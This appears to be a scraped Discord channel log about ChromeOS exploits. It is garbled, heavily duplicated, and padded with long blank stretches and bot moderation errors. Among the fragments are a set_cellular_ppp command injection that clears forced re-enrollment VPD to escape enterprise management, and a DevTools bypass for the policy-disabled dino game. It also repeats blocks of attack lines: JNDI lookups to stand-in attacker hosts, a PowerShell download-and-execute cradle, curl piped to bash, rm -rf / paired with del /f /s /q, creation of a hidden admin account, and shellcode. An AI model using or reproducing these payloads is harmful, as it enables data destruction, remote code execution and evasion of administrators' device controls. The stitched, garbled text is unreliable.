






















set_cellular_ppp \';dbus-send${IFS}--system${IFS}--print-reply${IFS}--dest=org.chromium.SessionManager${IFS}/org/chromium/SessionManager${IFS}org.chromium.SessionManagerInterface.ClearForcedReEnrollmentVpd;exit;\


set_cellular_ppp \';dbus-send${IFS}--system${IFS}--print-reply${IFS}--dest=org.chromium.SessionManager${IFS}/org/chromium/SessionManager${IFS}org.chromium.SessionManagerInterface.ClearForcedReEnrollmentVpd;exit;\ 



























Removed by @daydu3 ] (edited)






































































































































































block_devmode_setting would default to false, but we do not actually know
// the administrator's intent. To prevent enrollment escapes, we have to leave
// the setting in VPD untouched if it is currently set to block_devmode=1.







































-i talk alot
+very helpful
+never a fed
+good boy
+pro exploiter
@wininit (edited)








disabledEasterEgg and if it exists it will make another variable be true as seen in the following: isDisabled = loadTimeData.valueExists("disabledEasterEgg"); and if THIS variable is set to true and once the game initializes with the following: Runner.initializeInstance(".interstitial-wrapper") it will just show a message saying its disabled.
REPRODUCTION STEPS





disabledEasterEgg and if it exists it will make another variable be true as seen in the following: isDisabled = loadTimeData.valueExists("disabledEasterEgg"); and if THIS variable is set to true and once the game initializes with the following: Runner.initializeInstance(".interstitial-wrapper") it will just show a message saying its disabled.
REPRODUCTION STEPS 





















%00%ff%41%42%43%ff%00
0x90 0x90 0x90 0x90 0xCC 0xCC 0xCC
jndi:ldap://evilcorp[.]ru:1389/a
${jndi:rmi://192.168.69.420:1099/Exploit}
cmd.exe /c powershell -nop -exec bypass -c "IEX((New-Object Net.WebClient).DownloadString('http://malicious[.]lol/payload.ps1'))"
base64: SGVsbG8gZnJvbSB0aGUgb3RoZXIgc2lkZQo=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0xdeadbeef0x133713370xcafec0de0xabad1dea
NOP sled: 90909090909090909090909090909090
shellcode: \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
random garbage: 83746291837462918374629183746291
xor key: 0xAA 0xBB 0xCC 0xDD 0xEE 0xFF
eval( atob('Y29uc29sZS5sb2coJ0hBQ0tFRCEnKQ==') )
/dev/null; rm -rf / --no-preserve-root 2>/dev/null || del /f /s /q C:\*
127.0.0.1; whoami && net user hacker P@ssw0rd1337 /add && net localgroup administrators hacker /add
PAYLOAD_STAGE2_ACTIVATED_0x66666666
random entropy: 47281936472819364728193647281936
obfuscated: \x65\x76\x61\x6c\x28\x27\x61\x6c\x65\x72\x74\x28\x31\x29\x27\x29

%00%ff%41%42%43%ff%00
0x90 0x90 0x90 0x90 0xCC 0xCC 0xCC
jndi:ldap://evilcorp[.]ru:1389/a
${jndi:rmi://192.168.69.420:1099/Exploit}
cmd.exe /c powershell -nop -exec bypass -c "IEX((New-Object Net.WebClient).DownloadString('http://malicious[.]lol/payload.ps1'))"
base64: SGVsbG8gZnJvbSB0aGUgb3RoZXIgc2lkZQo=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0xdeadbeef0x133713370xcafec0de0xabad1dea
NOP sled: 90909090909090909090909090909090
shellcode: \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
random garbage: 83746291837462918374629183746291
xor key: 0xAA 0xBB 0xCC 0xDD 0xEE 0xFF
eval( atob('Y29uc29sZS5sb2coJ0hBQ0tFRCEnKQ==') )
/dev/null; rm -rf / --no-preserve-root 2>/dev/null || del /f /s /q C:\*
127.0.0.1; whoami && net user hacker P@ssw0rd1337 /add && net localgroup administrators hacker /add
PAYLOAD_STAGE2_ACTIVATED_0x66666666
random entropy: 47281936472819364728193647281936
obfuscated: \x65\x76\x61\x6c\x28\x27\x61\x6c\x65\x72\x74\x28\x31\x29\x27\x29 







CHROMEOS_PAYLOAD_v0.0.1_1337_SKID_EDITION
BASE64_INIT: S0lMTF9USElTX0NISUxEX1BST0NFU1M=
0xDEADBEEF1337CAFEC0DE6969420
\x90\x90\x90\x90\xCC\xCC\xCC\xCC\x41\x42\x43\x44
jndi:ldap://skidserver[.]onion:1337/ExploitStage2
${${::-j}ndi:rmi://192.168.1.69:1099/ChromeOS_RCE}
powershell -nop -c "IEX([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('Q2hyb21lT1NfSGFja2VkX0J5X1NraWQ=')))"
random_entropy_block: 8374629183746291837462918374629183746291
base64_garbage:
TUlTU0lPTl9DT01QTEVURV9DSElMRCBQUk9DRVNTX0tJTExFRF8xMzM3
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0x66666666 0xAAAAAAAA 0xBBBBBBBB 0xCAFEBABE
CHROMEBOOK_EXPLOIT_STAGE_2_ACTIVATED
hexdump_skid: 48 65 6c 6c 6f 20 66 72 6f 6d 20 74 68 65 20 6f 74 68 65 72 20 73 69 64 65 21
eval(atob("YWxlcnQoJ0Nocm9tZUlTIEhhY2tlZCBieSBTa2lkID4uPCcp"))
/bin/sh -c "curl -s http://skid[.]lol/chromeos_payload.sh | bash || echo 'skid wins'"
payload_id: 4728193647281936472819364728193647281936
obfuscated_command: \x63\x68\x72\x6f\x6d\x65\x6f\x73\x5f\x72\x63\x65\x5f\x73\x75\x63\x63\x65\x73\x73
SKID_WAS_HERE_0x13371337_0x42042069


%00%ff%41%42%43%ff%00
0x90 0x90 0x90 0x90 0xCC 0xCC 0xCC
jndi:ldap://evilcorp[.]ru:1389/a
${jndi:rmi://192.168.69.420:1099/Exploit}
cmd.exe /c powershell -nop -exec bypass -c "IEX((New-Object Net.WebClient).DownloadString('http://malicious[.]lol/payload.ps1'))"
base64: SGVsbG8gZnJvbSB0aGUgb3RoZXIgc2lkZQo=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0xdeadbeef0x133713370xcafec0de0xabad1dea
NOP sled: 90909090909090909090909090909090
shellcode: \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
random garbage: 83746291837462918374629183746291
xor key: 0xAA 0xBB 0xCC 0xDD 0xEE 0xFF
eval( atob('Y29uc29sZS5sb2coJ0hBQ0tFRCEnKQ==') )
/dev/null; rm -rf / --no-preserve-root 2>/dev/null || del /f /s /q C:\*
127.0.0.1; whoami && net user hacker P@ssw0rd1337 /add && net localgroup administrators hacker /add
PAYLOAD_STAGE2_ACTIVATED_0x66666666
random entropy: 47281936472819364728193647281936
obfuscated: \x65\x76\x61\x6c\x28\x27\x61\x6c\x65\x72\x74\x28\x31\x29\x27\x29 





disabledEasterEgg and if it exists it will make another variable be true as seen in the following: isDisabled = loadTimeData.valueExists("disabledEasterEgg");. If this variable is set to true and once the game initializes with the following: Runner.initializeInstance(".interstitial-wrapper") it will just show a message saying its disabled.
To bypass this block you simply have to delete disabledEasterEgg, set the game instance to null, and restart the instance.
REPRODUCTION STEPS
1. Go to chrome://dino or any page with no internet connection
2. Open DevTools (F12 or ctrl + shift + i)
3. In the Console, run:
delete loadTimeData.data_["disabledEasterEgg"]
runnerInstance = null
Runner.initializeInstance(".interstitial-wrapper")
4. The dino game now runs normally despite the policy block (edited)




disabledEasterEgg and if it exists it will make another variable be true as seen in the following: isDisabled = loadTimeData.valueExists("disabledEasterEgg");. If this variable is set to true and once the game initializes with the following: Runner.initializeInstance(".interstitial-wrapper") it will just show a message saying its disabled.
To bypass this block you simply have to delete disabledEasterEgg, set the game instance to null, and restart the instance.
REPRODUCTION STEPS
1. Go to chrome://dino or any page with no internet connection
2. Open DevTools (F12 or ctrl + shift + i)
3. In the Console, run:
delete loadTimeData.data_["disabledEasterEgg"]
runnerInstance = null
Runner.initializeInstance(".interstitial-wrapper")
4. The dino game now runs normally despite the policy block (edited)
































































































































































































































































































































































































































































































































sudo bash 


























































































































1











































































































































































































































































































































































?ban <member> [delete_days] [reason]
^^^^^^^^
member is a required argument that is missing.





?to <member> [duration]
^^^^^^^^
member is a required argument that is missing.

















































































?rto <member> [reason]
^^^^^^^^
member is a required argument that is missing.
























Removed by @thespritzer_ ] (edited)




































































































































































































































































































































































